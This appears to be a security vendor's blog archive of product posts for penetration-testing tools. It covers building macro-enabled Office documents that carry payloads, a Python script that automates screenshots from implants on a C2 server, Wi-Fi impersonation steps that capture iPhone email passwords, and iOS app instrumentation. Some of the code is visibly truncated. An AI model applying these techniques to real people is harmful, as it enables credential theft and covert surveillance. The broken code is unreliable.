Monday, May 23, 2016

The old Office Binder is back for more client-side funsies!

MS Office documents for targeted attacks: Re-Introducing CANVAS's Binderx module.

In targeted attacks, one of the most effective methods of compromising a remote computer is to send the victim a malicious Microsoft Office document with auto-executed VBA Macro. However,  MS Office Macros are not enabled by default and when a Macro-Embedded document is opened it will present a security warning stating that macros have been disabled and offering to “enable content”.   To achieve a successful exploitation the attacker must persuade the victim to click the button that will allow embedded Macro to run and compromise the system.  We will analyze some of the security warnings in the different MS Office versions.

VBA Macros and Ms Office's file formats

VBA Code or VBA Macros can be included in “legacy” binary formats such as .xls, .doc and .ppt
and in modern XML formatted documents like the Office Open XML file format (OOXML format) supported by MS Office 2007 and later. Documents, templates, worksheets, and presentations that you create in the MS Office 2007 release and later are saved with different file-name extensions with an “x” or an “m”.
For example, when you save a document in MS Word, the file now uses the .docx extension, instead of the .doc extension. 2007 release and later are saved with different file-name extensions with an “x” or an “m”.
For example, when you save a document in MS Word, the file now uses the .docx extension, instead of the .doc extension. To save a Macro-Embedded document you must save it as “Macro-Enabled Document” and the file-name extensions will be .docm (or .xlsm, .pptm, etc.). .

Illustration 1: Word Macro-Enabled documents in legacy format and OOXML format

Security Warnings in MS Office releases

VBA Macros are not enabled by default in MS Office versions. Hence the victim will see different warning messages.

MS Office 2007

MS Office 2010

MS Office 2016

In summary, the following table describes all messages produced when a Macro-Embedded file is opened. (Tested with legacy files and OOXML format files as well)

2007 2010 2013 2016
Security Warning Yes Yes Yes Yes
Security Alert Window Yes No No No

As we can see in the table above, in MS Office 2010 and higher versions there is no Security Alert Window. Of course, as we mentioned before, a successful exploitation relies on your social engineering skills to induce the victim to enable the macro execution.

Introducing Binderx module

CANVAS's Binderx module allows you to create an MS Office blank document with an embedded payload that will be executed using a VBA Macro.

Two types of document files can be created with the module: MS Word or MS Excel (using “legacy” format or OOXML format).

It is worth it to mention that MS Powerpoint does not include auto-execution Macro support like the ones available in MS Word and MS Excel.

Additionally, we added support to both Windows MOSDEF shellcode and PowerShell

Creating a legacy MS Word document with a PowerShell payload
Everyone loves a good shell!

Enjoy it! As always we appreciate any feedback from your experiences with these features during your penetration tests!

AnĂ­bal Irrera.

Wednesday, February 24, 2016

Leveraging INNUENDO's RPC for Fun and Profit: screengrab

INNUENDO 1.5 is on it's way, and along with a host of other great features, we've refined the RPC interface.

In this post I want to demonstrate how one can begin layering high-level automation on top of INNUENDO C2 operations using the RPC interface.

Let's start simple. All we want is a screenshot of the target machine every time a new implant process connects to the C2.

The first thing we need is access to the RPC client library. The RPC client can be found in the INNUENDO directory as "<innuendo>/". This file actually bundles all of the client dependencies within it, so the only requirement to use it is a Python (2.7) installation.

Once you've copied the client file to your local machine, you simply have to point it at the address and port of the C2 RPC server (and ensure that host/port is accessible, of course).

$ ./ -u tcp://<c2-host>:9998 ping

You'll notice that you have full access to the command-line interface using this file, but we can get quite a bit more flexibility if we import it into Python.

>>> import innuendo_client

This first import bootstraps the environment, and gives us access to the RPC client and it's dependencies. Now, we can import the client library:

>>> from innuendo import rpc

Now, let's connect to the RPC server.

>>> c = rpc.Client('tcp://<c2-host>:9998')
>>> c.module_names()
('exploitmanager', 'recon', ...)

Excelsior! Let's watch some implants sync:

>>> for event in'process'):
...     proc_id = event['data']['id']
...     proc = c.process_get(proc_id)
...     print proc['name'], proc['machine_alias']
netclassmon.exe Windows-7-x64-fuzzybunny
boot64.exe Windows-7-x64-wombat
rundll32.exe Windows-XP-x86-cabbage
boot64.exe Windows-7-x64-fuzzybunny
boot32.exe Windows-XP-x86-cabbage

NOTE: Here we are filtering for process events. If we wanted to grab all node events and any new machine events, we could call like this instead:'node', 'machine_added').

By reacting to this event stream, we can now begin to build a layer of automated decision-making on top of INNUENDO. A simple, but very useful option is to execute an operation or group of operations as soon as a new implant first syncs to the C2. Here's an example that takes a screenshot of the target as soon as an implant activates.

>>> for event in'process_added'):
...     proc_id = event['data']['id']
...     c.operation_execute([proc_id], 'screengrab')

This snippet will queue a "recon.screengrab" operation on the C2 for every process that is added while the script is running. The GIF below shows us how it would look in INNUENDO's UI.

Let's take it a bit further and dump thumbnails of the screenshots into a local directory. The full source for catching the right events is below, but first let's just take a step-by-step look at grabbing operation results.

>>> import msgpack
>>> res = c.operation_attributes(oper_id)
>>> attrs = msgpack.unpackb(res)

Since operation attributes can potentially store large binary data, the RPC layer does not automatically deserialize them for you, so we do that with msgpack.

NOTE: msgpack is a serialization library. A pure-Python version is bundled with the client library, but if you need higher performance, you'll want to grab the full package off of PyPI, which includes a C implemention. The client will prefer an installed copy over the bundled copy.

>>> server_path = attrs['data'][0]['path']

This gives us the path of the screenshot image file on the C2 server. Index 0 is the first of potentially several images that could have been grabbed. Now we just have to ask the C2 for the file and save it locally.

>>> local_path = os.path.basename(remote_path)
>>> with open(local_path, 'w+b') as file:
...     for chunk in c.file_download(remote_path):
...         file.write(chunk)

This will stream the screenshot chunk-by-chunk to a file in the current directory. Let's put it all together!

import os

# bootstrap the client environment
import innuendo_client

import msgpack
from innuendo import rpc

def main():
    print 'waiting'
    c = rpc.Client()
    # track the operations we want to watch
    oper_ids = set()
    for event in'process_added', 'operation_updated'):
        if not event:
            # the server will send out "heartbeat" events periodically
            # we can ignore them
        elif event['name'] == 'process_added':
            print 'process_added: taking screenshot'
            # grab the ID of the process that just activated
            proc_id = event['data']['id']
            # queue a screengrab operation and track it's ID
            res = c.operation_execute([proc_id], 'screengrab', wait=True)
            print 'operation_added:', res[0]
        elif event['name'] == 'operation_updated':
            # grab the ID of the operation that was just updated
            oper_id = event['data']['id']
            # make sure it's an operation we are tracking
            if oper_id not in oper_ids:
            # get the operation data so we can check it's state
            oper = c.operation_get(oper_id)
            print 'operation_updated:', oper['state']
            # wait until the operation is finished
            if oper['state'] != 'finished':
            # grab and unpack the operation's attributes
            res = c.operation_attributes(oper_id)
            attrs = msgpack.unpackb(res)
            # get the remote path of the first screenshot
            remote_path = attrs['data'][0]['path']
            local_path = os.path.basename(remote_path)
            # stream the screenshot to a local file
            with open(local_path, 'w+') as file:
                for chunk in c.file_download(remote_path):
            print 'saved:', local_path

if __name__ == '__main__':
    except KeyboardInterrupt:

With this script running, you should see a new screenshot saved to the current directory soon after every new implant process activates. This same procedure can be used to process results from any INNUENDO operation. Stay tuned for more!

Tuesday, February 9, 2016


SILICA – Mapping access points (looking for Rogue APs)

We are happy to announce a new and exciting feature of SILICA that will be available with the 7.24 release (shortly!).

If you are in charge of protecting the wireless networks of a business, you often worry about rogue access points -  that is an AP that has been installed on your secure network without authorization.

SILICA's new AP Mapping is a feature that allows you to quickly and easily make a map of where the APs near you are placed. This feature not only is useful for finding rogue APs, but can also aid in detecting holes in wireless coverage, and also detect possible fake access points (access points external to the network that want to attack your wireless stations).

The user interface for the data entry part of this feature is simple. It consists of a map (or optionally you can just eyeball it on the blank canvas, which is what I always do) and buttons to control the beacon's capture and to determine the current location.

The user can record paths as he moves around the office, control the current wireless channel, view intermediate results, undo paths (useful after a miss-click on the map), and save the results to file. It takes about 30 seconds to figure out - after which you are merrily wandering your office with your SILICA laptop in hand mapping out every AP you can see.

You can make your maps in MS Paint or use Google Maps for high quality renditions. Or just start with a blank area (this still works).

The results section of this feature is rich in features. There are three basic map types that are produced, using the magic of math:

1) The Heatmap. This map is based on the estimated signal power of the access point that is most powerful in each location.

2) The AP Zones map. This map is based on what are the zones of influence of the more powerful access points. The zone of influence is the zone where one access point is the most powerful one.

3) The captured data map. This map show the signal power of access points in each location according to the beacon captures without interpolation or estimation. The user interface allows you to view this map for each access point, both for the average signal power and for the maximum signal power.

For the first two of the map types, the algorithm that SILICA uses to estimate the access points location and power are critical. There are various factors that influence the strength of the signal when received by the SILICA card: distance from the access point, obstacles that cause reflection or diffraction, relative angle of the AP's and SILICA's antennas, and interference from other sources. This means that the algorithm has to handle a very noisy signal, so we use a relatively simple algorithm to estimate the access point parameters - and also why it is best if you have more than just three or four points in your walk-path.

The first step is estimating the access point position, for this a number (at least 10) of the most powerful signals are averaged and the position and power are taken as the center of the signal.
To calculate the rate of power loss with the distance from the center, a linear approximation is used, using the least square regression method.

Finding out the zone of influence of each access point is more involved. A naive algorithm would be to calculate the estimated power for each access point and for each pixel of the map, and selecting the most powerful signal for each location, but this doesn't scale. What SIILCA uses is a divide-and-conquer method to find out the zones of each access point. This way, the graphs are quickly generated, even for high-resolution maps with many access points.

Example graph of how the map is divided in zones by the divide-and-conquer algorithm:

We hope everyone likes the new feature! More interesting updates are on the way, and if you want to ask questions about getting a SILICA, just email!

Tuesday, January 5, 2016

The Danger of "Other" on the iPhone

This is what it looks like when your whole organization just got compromised because you sat down at StarBucks for second.

So there's a lot of different ways to configure your email on the iPhone. Some of them are more dangerous than others. It took us a long time to track this down - because on wireless penetration tests we'd often get passwords using SILICA, and I never got to ask how that happened to the user. Many users don't feel like letting a penetration tester rummage through their phone settings.

One of these options is not like the other! Ok it is. Wait.

Literally a year went by and every time we got a password I asked the testers "HOW IS THIS HAPPENING?!?".

Here is the testing methodology which gets you a password every time:

  • Start SILICA
  • Add "attwifi" in the AP window
  • Right click attwifi and select AP->Service Impersonation
  • Wait about 30 minutes or less
  • Enjoy your new password!

I couldn't figure out why this worked so well. But now I know: Many people use IMAPS (even with Gmail), and to set that up they go to "other" as many web pages suggest you do, and they input all their information and ostensibly it is secure. The following images show what you probably have:

So what happens then is you, the user of the iPhone, will connect to AT&T wifi, and when you check your mail a little popup message will appear. It will offer you the option to "Continue". If you click that very natural button, SILICA will steal your password. It's just that simple. If you have your email configured any other way, then it won't even give you that option. Instead, it fails silently and securely, without giving anyone your password.

One of the reasons companies buy SILICA is for repeatable testability. Everyone can follow that simple methodology and test all the executive team's phones. It either works or it doesn't. It took a while to figure out what was happening, but without this, I wouldn't have realized what a severe issue it was, since the phones around the office are configured securely! :)

Thursday, September 17, 2015

Mobile applications instrumentation and reverse engineering, no-jailbreak style

With the advent of instrumentation frameworks such as Frida (1), mobile application assessment methodology has become increasingly sophisticated. Modern Enterprise environments almost always include a mobile device component and when performing a security assessment for the Enterprise, having the ability to rapidly introspect mobile applications is hugely beneficial to an assessment team.

Most Enterprise mobile applications are essentially just web service specific browser implementations in the sense that the application heavily interacts with a, often obscured, back-end web API.

Because the developers have in their heads an implicit assumption that only they are going to be peeking under the covers of their application, they often miss the subtle things that can be done with their API or the data they are sending to the mobile device.

So as a penetration tester, you can ask yourself these questions:

What data is available to the user of the application that could be used in a sensitive way. Is there geolocation data for other users? Is there information sent to the mobile device that is not displayed, but is highly interesting and can be correlated with other data to reveal something sensitive?

How much of the application's security is client side and not enforced by the server? This used to be common in web applications, but in mobile applications it is now a huge problem. Remember all the old bugs where you could set a price to -1 dollars and get something for free...
What rate limits are set on authentication attempts, if any?

Are there any input injection vulnerabilities in the back-end servers? Can I send weird data to another mobile device that confuses it?

These are all questions that you would ask in any web application assessment, but now, you want to ask them in the mobile world. And of course, these questions cannot be answered by automated static analysis, so exposing this to a human is a key feature of any toolset.

Having the ability to take an existing application and instrumenting it to interact with its back-end service in controlled ways hugely increases the ability to determine API semantics and attack surface scope without having to jump through a lot of code analysis hoops. It also allows you to quickly change the behavior of an existing application in an effort to make the back-end service perform actions it was never intended to perform or return data that was not intended to be visible to the end user.

Normally dealing with such analysis on mobile OSes can be frustrating as usually one would rely on the availability of public jailbreaks in order to jailbreak the device and then bypass the restrictions imposed by the mobile OS itself on outside application instrumentation. This is specifically true for iOS. But being too low level is a huge problem! You want to interact with the application the way the developers do - using the objects and functions they created!

As such, our consulting team has a reoccurring need to fully instrument and alter the runtime behavior of a given mobile application on iOS, but without having to rely on jailbreaks. This spawned the development of BLACKBUCK: a jailbreak agnostic iOS application instrumentation framework which we use to perform our mobile assessments (as you know if you are a customer :).


BLACKBUCK builds on top of a variety of existing analysis frameworks. It currently links frida-gum, capstone and a ctypes bridging framework that allows us to interact with Objective-C directly from Python. BLACKBUCK is essentially an iOS injectable dylib that provides a runtime Python-based bridge into the iOS application's runtime internals including its Objective-C objects and methods.

BLACKBUCK currently only supports iOS. For BLACKBUCK delivery on non-jailbroken iOS we use a second Immunity tool which we called JOEY.


The way you generally modify an iOS mobile application without relying on a jailbreak is to first obtain a valid certificate from Apple, then modify the target mobile app Mach-O binary so that it loads a custom dynamic library, re-sign and re-package everything, and then re-install the app to the device.

This is the general modus operandi for non-AppStore apps. Such as apps that are given to you by e.g. the Enterprise customer you are performing an assessment for and which lack the usual AppStore encryption layer. For AppStore based apps, you would first dump the decrypted application from memory and then proceed just as you would with a non-AppStore app.

JOEY automates the non-AppStore scenario, since there are already tools available to perform the memory dump rebuild for AppStore apps, JOEY currently does not include such functionality. It is, however, on the docket for a future release.

JOEY is written in PyQT and as such JOEY's front-end can run on anything that can run Python and the QT framework. The JOEY back-end has to run on Mac OS X which is where the actual code signing occurs.

The way JOEY works is very simple: you pass the original IPA package, the dylib you want to inject, and provide a destination path for the re-signed package. JOEY will then build the repackaged application it for you that includes your custom dylib.


BLACKBUCK is written in Python and provides an API to interact with all the frameworks we rely on, which means we can directly access a lot of the features that are normally internal to e.g. Frida.

As mentioned previously we also have the ability to interact with Objective-C code directly from Python. This Python layer allows you to implement an Objective-C class entirely in Python, hook Objective-C methods with Python methods, and so on and so forth.

Currently you can interact with BLACKBUCK either by uploading Python modules to have them executed or imported, or by accessing the BLACKBUCK web interface.

BLACKBUCK web interface

The BLACKBUCK web interface is very useful and allows us to interact with and control our hijacked application via BLACKBUCK. You could also use the alternate interaction method (file upload) to upload a Python module and then import it into the runtime session to start inspecting and influencing the application.

So now that you have a basic idea of what BLACKBUCK is, let's have a look at a demo:

1. Frida -